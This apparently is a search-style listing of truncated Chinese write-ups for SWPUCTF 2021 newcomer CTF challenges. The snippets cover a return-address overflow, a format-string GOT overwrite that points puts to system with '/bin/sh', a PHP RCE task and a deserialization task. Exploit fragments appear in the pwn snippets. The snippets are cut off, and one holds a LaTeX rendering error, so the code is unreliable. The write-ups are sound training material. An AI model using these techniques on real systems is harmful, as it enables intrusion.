简介: [SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天 按照签到题的套路是找main,buf,shell,bin/sh/,这个是加了一个gift的地址 距离rbp 16字节,我们要再加上我们的8个字节 最后加上我们的返回地址,是上面找到的gift的地址,payload就完成了 from pwn import * p = remote('node4.anna.nssctf.cn',...
(( ,###@!!$: )) .###@!!$: `##@@!$: `#@!!$ !@# `#@!$: @#$ #$ `#@!$: !@! '@!$: '`\ "!$: /`' '\ '!: /' "\ : /" -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\ " -."-.\\"-."//.-".`-."_\\-.".-\".-//''' print...
libc=ELF("./libc-2.31.so") elf=ELF("./pwn") io.recvuntil(b"0x") puts_addr=int(io.recv(12),16) base=puts_addr-libc.symbols["puts"] system_addr=base+libc.symbols["system"] payload=fmtstr_payload(6,{elf.got["puts"]:system_addr,0x403878:b'/bin/sh\x00'}) io.recvuntil(b'now...
第一道签到题:web [SWPUCTF 2021 新生赛]gift_F12: 打开题目场景,如图: 之前写过的网站中有个⏲计时页面,用的HTML和嵌入式JavaScript(俗称js)代码写的,所以说这道web签到题只要查看源代码,找到嵌入式的js代码就可以找到flag。 查看源代码后发现flag: 提交的时候把flag格式转换成NSSCTF格式即可。 第二道签到题...
[SWPUCTF 2021 新生赛]easyrce-解题思路 一、对于题目环境中函数的一些理解: 1. 屏蔽所有报错信息的函数。 error_reporting(0); 2. 对文件进行语法高亮显示的函数。 highlight_file(); 3. 环境中重要的代码段。 if(isset(You can't use 'macro parameter character #' in math mode_GET函数获取变量数据...
1.[SWPUCTF 2021 新生赛]ez_unserialize2024-02-212.BUGKU_PWN_OVERFLOW2_WP2023-06-10 收起 概括 这是一道PHP反序列化的CTF赛题,本意是想用这道题对PHP反序列化进行一定的学习。 过程 我们打开赛题,看看内容 没有发现什么东西,看看他的页面代码 根据他的提示,感觉是存在一个robots.txt文件的,尝试访问一...